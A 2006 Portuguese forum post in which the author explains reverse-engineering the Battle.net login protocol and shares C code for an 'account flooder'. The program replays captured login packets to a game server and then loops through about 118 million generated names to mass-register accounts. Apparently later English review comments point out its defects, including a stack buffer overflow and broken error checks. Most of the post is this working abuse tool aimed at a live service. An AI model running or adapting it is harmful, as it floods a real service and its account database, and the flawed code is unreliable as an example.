Battle.net - Flood Account

Started by Dark_Side, 03 de December , 2006, 09:29:40 PM



Dark_Side

Hi,

Neste meu último mês, voltei a brincar com esses jogos online. Em um jogo que utiliza o protocolo BATTLE.NET (exemplos: warcraft, broodwar, etc), fiquei curioso para saber como funcionava o processo de login e criação de novas contas. Procurando pela documentação do protocolo, não encontrei nada que realmente pudesse me guiar, então, resolvi entender o protocolo na "unha" através de sockets e com a ajuda do NETCAT.

Consegui ver os dados que eram trocados entre o servidor e o cliente e resolvi fazer um pequeno programa pra treinar =)

Trata-se de um Flood Account - um programa que cria diversas contas no servidor....

Segue o código em C:

// By Dark Side
#include <stdio.h>
#include <winsock.h>

#define HOST_IP  "xxx.xxx.xxx.xxx" // IP do servidor

WSADATA wsadata;            // filled in by WSAStartup() in main()
SOCKET sock;                // the single TCP connection main() opens to HOST_IP:6112
struct sockaddr_in addr;    // destination address, populated in main() before connect()

int a,b,c,d,e,n;            // loop counters for the six rewritten bytes of the account blob; file-scope but only main() touches them


/*
 * Entry point. Connects to HOST_IP:6112 over TCP, replays four hard-coded
 * byte blobs (acc, login_code, profile, conta) and then loops, rewriting six
 * bytes of `conta` per iteration. Returns 1 on any of the checked failures,
 * 0 after the loop finishes. Lines marked NOTE(review) point at defects in
 * this code as written; none of them are fixed here.
 */
int main()
{


puts("Inicializando...");

// Initialise winsock.
// NOTE(review): WSAStartup() returns 0 on success and a nonzero error code
// on failure; comparing against -1 misses almost every failure case.
if(WSAStartup(0x101,&wsadata) == -1)
    {
      puts("Erro na inicializacao.");
      return 1;
      }


puts("Criando socket...");

// Create the TCP socket.
// NOTE(review): SOCKET is an unsigned type on Win32; the documented failure
// value is INVALID_SOCKET, not -1 (the comparison only works by conversion).
sock = socket(AF_INET,SOCK_STREAM,0);

if(sock == -1)
{
      puts("Ocorreu um erro ao criar socket");
      return 1;
      }

// First captured blob: the opening bytes the client sends after connecting.
// Replayed verbatim; the meaning of the individual fields is not documented here.
char acc[] = "\x1\xff\x50\x33\x0\x0\x0\x0\x0\x36\x38\x58\x49\x50\x58\x45\x53\xcd\x0\x0\x0"
             "\x53\x55\x6e\x65\x7f\x0\x0\x1\xb4\x0\x0\x0\x16\x4\x0\x0\x16\x4\x0\x0\x42"
             "\x52\x41\x0\x42\x72\x61\x7a\x69\x6c\x0";

// Second captured blob: starts the login sequence.
char login_code[] = "\xff\x25\x8\x0\xa3\xfa\x19\x6\xff\x51\x75\x0\xa5\xd5\x2e\x46\xb\x3"
                    "\x1\x1\x6d\x1d\xed\x8f\x1\x0\x0\x0\x0\x0\x0\x0\xd\x0\x0\x0\xc\x0\x0"
                    "\x0\xa6\x44\x0\x0\x0\x0\x0\x0\x86\x1\x6\xa8\x90\xb2\x35\xeb\xfd\x9f"
                    "\x84\x4b\xdf\x61\x43\xe4\xfe\x3\xee\xc6\x73\x74\x61\x72\x63\x72\x61"
                    "\x66\x74\x2e\x65\x78\x65\x20\x30\x31\x2f\x31\x33\x2f\x30\x36\x20\x30"
                    "\x35\x3a\x34\x32\x3a\x34\x38\x20\x31\x31\x34\x36\x39\x33\x39\x0\x57"
                    "\x61\x6c\x6c\x61\x63\x65\x20\x46\x65\x72\x72\x65\x69\x72\x61\x0";

                   
                    // Third captured blob: a fabricated profile.
char profile[] = "\xff\x2d\x4\x0\xff\x33\x1b\x0\x1d\x0\x0\x0\x0\x0\x0\x0\x69\x63"
"\x6f\x6e\x73\x5f\x53\x54\x41\x52\x2e\x62\x6e\x69\x0\xff\x33\x18\x0\x1a\x0\x0\x0"
"\x0\x0\x0\x0\x74\x6f\x73\x5f\x55\x53\x41\x2e\x74\x78\x74\x0\xff\x33\x19\x0\x1b\x0"
"\x0\x0\x0\x0\x0\x0\x62\x6e\x73\x65\x72\x76\x65\x72\x2e\x69\x6e\x69\x0\xff\x26\x9d"
"\x1\x1\x0\x0\x0\x13\x0\x0\x0\xda\x81\xbd\x0\x6f\x57\x0\x70\x72\x6f\x66\x69\x6c\x65"
"\x5c\x73\x65\x78\x0\x70\x72\x6f\x66\x69\x6c\x65\x5c\x61\x67\x65\x0\x70\x72\x6f\x66"
"\x69\x6c\x65\x5c\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x0\x70\x72\x6f\x66\x69\x6c\x65\x5c"
"\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45"
"\x58\x50\x5c\x30\x5c\x77\x69\x6e\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x30\x5c\x6c\x6f\x73\x73\x65\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x30\x5c\x64\x69\x73\x63\x6f\x6e\x6e\x65\x63\x74\x73\x0\x52\x65\x63\x6f\x72\x64"
"\x5c\x53\x45\x58\x50\x5c\x30\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65\x0\x52\x65\x63"
"\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x30\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65\x20"
"\x72\x65\x73\x75\x6c\x74\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c"
"\x77\x69\x6e\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x6c\x6f"
"\x73\x73\x65\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x64\x69"
"\x73\x63\x6f\x6e\x6e\x65\x63\x74\x73\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x31\x5c\x72\x61\x74\x69\x6e\x67\x0\x52\x65\x63\x6f\x72\x64\x5c\x53\x45\x58\x50"
"\x5c\x31\x5c\x68\x69\x67\x68\x20\x72\x61\x74\x69\x6e\x67\x0\x44\x79\x6e\x4b\x65\x79"
"\x5c\x53\x45\x58\x50\x5c\x31\x5c\x72\x61\x6e\x6b\x0\x52\x65\x63\x6f\x72\x64\x5c\x53"
"\x45\x58\x50\x5c\x31\x5c\x68\x69\x67\x68\x20\x72\x61\x6e\x6b\x0\x52\x65\x63\x6f\x72"
"\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65\x0\x52\x65"
"\x63\x6f\x72\x64\x5c\x53\x45\x58\x50\x5c\x31\x5c\x6c\x61\x73\x74\x20\x67\x61\x6d\x65"
"\x20\x72\x65\x73\x75\x6c\x74\x0\x0";

// Fourth blob: the account-creation message. Bytes 58..63 hold the account
// name and are the only bytes rewritten by the loop below.
char conta[] = "\xff\x3d\x1e\x0\x93\x24\x44\xfe\x78\x0\xc2\x6d\x51\x95\x33\xa0\x3\x23\xf8\x59"
"\x13\x3f\x51\x6e\x44\x44\x44\x44\x44\x0\xff\x0\x4\x0\xff\x3d\x1f\x0\x84\x10\x4d\x8a\xaf\x3d"
"\x64\x91\x2c\x7e\xa8\x84\xd4\x36\x18\x27\xf8\x66\x56\x1e\x41\x41\x41\x41\x41\x30\x0";

// Fill in the destination address: fixed port 6112, HOST_IP as a dotted quad.
// NOTE(review): inet_addr() returns INADDR_NONE for a malformed string and
// that result is not checked before connect().
addr.sin_family=AF_INET;
addr.sin_port = htons(6112);
addr.sin_addr.s_addr = inet_addr(HOST_IP);

puts("Conectando-se...");

// Connect to the server.
if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
{
                        puts("Erro ao se conectar...");
                        return 1;
                        }
                       
puts("Enviando dados...");

// Send the first blob.
// NOTE(review): no send() result in this function is ever checked; a short
// or failed send is silently ignored and the protocol exchange continues.
send(sock,acc,52,0);
char resp[100];

// Read the reply. resp is never inspected, only overwritten; it is not
// NUL-terminated, so it must not be treated as a C string.
int i = recv(sock,resp,100,0);
if(i < 0) // recv() error
{
      puts("Ocorreu um erro ao enviar dados");
      return 1; // give up
      }

// Send the second blob.
// NOTE(review): memset() is used without #include <string.h>; this only
// compiles if winsock.h happens to pull it in transitively.
send(sock,login_code,125,0);
memset(resp,0x0,100);
i = recv(sock,resp,100,0);

// NOTE(review): `!i < 0` parses as `(!i) < 0`, which is never true, so this
// branch is dead code and a recv() error here goes unnoticed; the other
// checks in this function use `i < 0`.
if(!i < 0)
{
      puts("Ocorreu um erro ao enviar dados");
      return 1;
      }


send(sock,profile,493,0); // Send the third blob

// NOTE(review): resp is 100 bytes but recv() is told it may write 5000.
// Any peer that answers with more than 100 bytes overflows this stack
// buffer — a memory-safety defect in the client itself.
memset(resp,0x0,100);
i = recv(sock,resp,5000,0);
if(i < 0)
{
      puts("Ocorreu um erro ao enviar dados");
      return 1;
      }



// Account-creation loop.
puts("Floodandando...");

// Iterates over the names AAAAA0, AAAAA1, ... up to ZZZZZ9 (five letters
// from the six-nested loops' ASCII ranges 65..90, then a digit 48..57).

// NOTE(review): the loops as written run 26^5 * 10 = 118,813,760 times; the
// original comment claimed "about 87,890,625", which corresponds to 25^5 * 9.
for(a=65;a<=90;a++)
 for(b=65;b<=90;b++)
  for(c=65;c<=90;c++)
   for(d=65;d<=90;d++)
    for(e=65;e<=90;e++)
     for(n=48;n<=57;n++)
        {
            conta[58] = (char)a;
            conta[59] = (char)b;
            conta[60] = (char)c;
            conta[61] = (char)d;
            conta[62] = (char)e;
            conta[63] = (char)n;
           
             
send(sock,conta,65,0);  // Send the account blob with the six name bytes rewritten

// NOTE(review): the reply is discarded and the recv() result is not checked,
// so a closed or reset connection is never detected inside the loop.
memset(resp,0x0,100);
i = recv(sock,resp,100,0);

}
 
  // Close the socket, tear down winsock and exit.
closesocket(sock);
WSACleanup();
return 0;
      }

Sei que não é algo tão interessante, mas é bom para incrementar o conhecimento =)

Bye.